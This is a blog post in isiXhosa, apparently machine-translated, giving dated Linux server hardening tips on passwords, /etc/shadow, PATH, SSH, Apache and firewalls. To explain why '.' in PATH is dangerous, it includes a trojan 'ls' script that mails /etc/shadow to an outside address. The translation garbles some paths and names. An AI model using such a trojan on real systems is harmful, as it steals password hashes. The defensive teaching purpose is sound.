Iingcebiso zoKhuseleko kwiLinux yakho (iseva) (Icandelo 1)

@Jlcmux

Imizuzu ye5

Andizange ndipapashe nantoni na kwiblogi ixesha elide kwaye ndingathanda ukwabelana nawe ngezinye iingcebiso ezithathwe kwincwadi ethi, (Phakathi kwabanye). Ndiyifumene kwiYunivesithi kwaye ndiyifunde nje kwaye nangona ngokunyanisekileyo iphelelwe yisikhathi kwaye iindlela ezibonisiweyo azinakwenzeka ukuba zisebenze ngokunikezelwa kwenkqubo, ziseyimiba enomdla enokuboniswa. 9788448140502

Ndifuna ukucacisa ukuba ezi zingcebiso ezijoliswe kwinkqubo yeLinux esetyenziswa njengomncedisi, phakathi okanye mhlawumbi isikali esikhulu esinikwe ukuba kwinqanaba lomsebenzisi wedesktop, nangona zingasetyenziswa, aziyi kuba luncedo kakhulu.

Ndikwalumkisa ukuba zingcebiso ezikhawulezayo kwaye andizukungena kwiinkcukacha ezininzi, nangona ndiceba ukwenza esinye isithuba esithe ngqo nesibanzi kwisihloko esithile. Kodwa ndiza kuyibona kamva. Masiqalise.

Iipolisi zephasiwedi. 

Nangona kunokuvakala ngathi yi-cliché, ukuba nomgaqo-nkqubo we-password olungileyo kwenza umahluko phakathi kwenkqubo esengozini okanye hayi. Uhlaselo olufana ne "brute force" luthatha ithuba lokuba negama elibi lokufikelela kwinkqubo. Awona macebiso axhaphakileyo ngala:

  • Dibanisa icala eliphezulu nelisezantsi.
  • Sebenzisa abalinganiswa abakhethekileyo.
  • Amanani.
  • Ngaphezulu kwamanani ama-6 (ngethemba elingaphezulu kwesi-8).

Ukongeza koku, makhe sithathele ingqalelo iifayile ezimbini ezibalulekileyo.  /etc/passwd kunye /etc/shadow.

Into ebaluleke kakhulu kukuba ifayile /etc/passwd. Ukongeza ekusinikeni igama lomsebenzisi, i-uid, ifolda yendlela, bash... njl. kwezinye iimeko ikwabonisa iqhosha elifihliweyo lomsebenzisi.

 Makhe sijonge ukwakheka kwayo okuqhelekileyo.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

umsebenzisi:i-cryptkey:uid:gid:indlela::indlela:bash

Eyona ngxaki apha kukuba le fayile ineemvume -rw-r–r– nto leyo ethetha ukuba ineemvume zokufunda kuye nawuphi na umsebenzisi kwinkqubo. kwaye ukuba nesitshixo esifihliweyo akukho nzima kakhulu ukucacisa eyona yokwenyani.

Yiyo loo nto ifayile ikhona / njl / isithunzi. Le yifayile apho zonke izitshixo zomsebenzisi zigcinwa khona, phakathi kwezinye izinto. Le fayile ineemvume eziyimfuneko ukuze kungabikho msebenzisi unokuyifunda.

Ukulungisa oku ke, kufuneka siye kwifayile / njl / njl kwaye utshintshe isitshixo esifihliweyo sibe ngu "x", oku kuya kubangela ukuba isitshixo sigcinwe kuphela kwifayile yethu / njl / isithunzi.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Iingxaki nge-PATH kunye .bashrc kunye nabanye.

Xa umsebenzisi ephumeza umyalelo kwiconsole yabo, iqokobhe likhangela loo myalelo kuluhlu lwabalawuli abaqulethwe ku PATH umahluko wemekobume.

Ukuba uchwetheza "echo $ PATH" kwikhonsoli, into enje iya kuvela.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Nganye kwezi ncwadi kulapho iqokobhe lizakukhangela umyalelo obhaliweyo wokuwuphumeza. Yena "." Kuthetha ukuba isiqulathi seefayili sokuqala esiphendlayo sisilawulo esifanayo apho umyalelo uphunyezwa khona.

Masithi kukho umsebenzisi "carlos" kwaye lo msebenzisi ufuna "ukwenza izinto ezimbi." Lo msebenzisi unokushiya ifayile ebizwa ngokuba yi "ls" kulawulo lwabo oluphambili, kwaye kule fayile phumeza umyalelo onje:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Kwaye ukuba umsebenzisi oyingcambu, ngenxa yesiphelo, uzama ukudwelisa amaxwebhu ngaphakathi kwencwadi kaCarlos (njengoko eqala ukukhangela umyalelo kwakuloo folda, ngaphandle kokuqaphela uya kuthumela ifayile kunye namagama ayimfihlo kule email kwaye emva koko Iifolda ziya kudweliswa kwaye akazukuyiqaphela de kube mva kakhulu.

Ukuphepha oko kufuneka siphelise "." yoguqulo lwe PATH.

Ngendlela efanayo, iifayile ezinjenge /.bashrc, /.bashrc_profile, ./.login kufuneka ziphicothwe kwaye ukhangele ukuba "." akakho. kuMENDO oguquguqukayo, kwaye eneneni kwiifayile ezinje, ungatshintsha indawo ekuyiwa kuyo yomyalelo othile.

Iingcebiso ezineenkonzo:

SHH

  • Khubaza uguqulelo loku-1 lweprotocol ye-ssh kwi-arcvhio sshd_config.
  • Ungavumeli umsebenzisi wengcambu ukuba angene nge ssh.
  • I-ssh_host_key, ssh_host_dsa_key, kunye ssh_host_rsa_iifayile neefolda kufuneka zifundwe kuphela ngumsebenzisi oyingcambu.

FUNDA

  • Guqula umyalezo wokwamkela kwifayile enegama.conf ukuze ingabonakalisi inombolo yenguqulelo
  • Ugqithiso lwezowuni yokunciphisa, kwaye uyivumele kuphela izixhobo eziyidingayo.

Apache

  • Thintela inkonzo ekuboniseni inguqulelo yakho kumyalezo wokwamkela. Hlela ifayile ye-httpd.conf kwaye wongeze okanye ulungise imigca:  

ServerSignature Off
ServerTokens Prod

  • Khubaza isalathisi esizenzekelayo
  • Qwalasela i-Apache ukuba inganikezeli iifayile ezinovakalelo njenge .htacces, *.inc, *.jsp.. njl.
  • Cima imanyuwali okanye amaphepha omzekelo kwinkonzo
  • Qhuba i-Apache kwindawo yechroot

Ukhuseleko lwenethiwekhi.

Kubalulekile ukugubungela onke amangeno anokwenzeka kwisistim yakho ukusuka kuthungelwano lwangaphandle, apha ngezantsi kukho iingcebiso ezibalulekileyo zokuthintela abangeneleli ukuba bangaskena kwaye bafumane ulwazi kwinethiwekhi yakho.

Vala itrafikhi ye-ICMP

I-firewall kufuneka ilungiselelwe ukuvimba zonke iintlobo zetrafikhi ye-ICMP engenayo kunye nephumayo kunye neempendulo ze-echo. Ngale nto uthintela, umzekelo, iskena esikhangela izixhobo ezibukhoma kuluhlu lwe-IP ekukufumaneni. 

Kuphephe TCP ping scan.

Enye indlela yokuskena inkqubo yakho yi-TCP ping scan. Caba ukuba kumncedisi wakho kukho umncedisi we Apache kwizibuko 80. Umngeneleli angathumela isicelo se ACK kwizibuko elithethiweyo, ngale nto, ukuba inkqubo iyaphendula, iyakuqinisekiswa ukuba ikhomputha iyaphila kwaye izakuskena amanye amazibuko. .

Kule nto, i-firewall yakho kufuneka ihlale inokhetho "lolwazi lwelizwe" kwaye kufuneka ulahle zonke iipakethi ze-ACK ezingahambelani noqhagamshelwano olusele lusekiwe lwe-TCP okanye iseshoni.

Ezinye iingcebiso ezongezelelweyo:

  • Sebenzisa iisistim ze-IDS ukubona izikena zezibuko kuthungelwano lwakho.
  • Qwalasela iFirewall ukuba ungathembeli kumthombo woqhagamshelo amaxabiso ezibuko.

Oku kungenxa yokuba ezinye izikena zisebenzisa i "fake" izibuko imvelaphi ezifana 20 okanye 53, ekubeni iinkqubo ezininzi zixhomekeke kula mazibuko njengoko eqhelekileyo FTP okanye DNS.

QAPHELA: Khumbula ukuba uninzi lweengxaki ezibonakaliswe kwesi sithuba sele zisonjululwe phantse kuzo zonke izinikezelo zangoku. Kodwa akukhe kube buhlungu ukuba nolwazi oluphambili malunga nezi zinto ziphazamisayo ukuze zingenzeki kuwe.

QAPHELA: Kamva ndiza kujonga isihloko esithile kwaye ndenze isithuba esineenkcukacha ezininzi kunye nolwazi lwangoku.

Enkosi wonke umntu ngokufunda.

Ukubulisa


Shiya uluvo lwakho

Idilesi yakho ye email aziyi kupapashwa. ezidingekayo ziphawulwe *

*

*

  1. Uxanduva lwedatha: UMiguel Ángel Gatón
  2. Injongo yedatha: Ulawulo lwe-SPAM, ulawulo lwezimvo.
  3. Umthetho: Imvume yakho
  4. Unxibelelwano lwedatha: Idatha ayizukuhanjiswa kubantu besithathu ngaphandle koxanduva lomthetho.
  5. Ukugcinwa kweenkcukacha
  6. Amalungelo: Ngalo naliphi na ixesha unganciphisa, uphinde uphinde ucime ulwazi lwakho.

  1.   ngokufundisayo sitsho
    yenzayo 8 iminyaka

    Ndiyithande kakhulu inqaku kwaye ndinomdla kwisihloko, ndikhuthaza ukuba uqhubeke nokulayisha umxholo.

    Phendula kwi-IT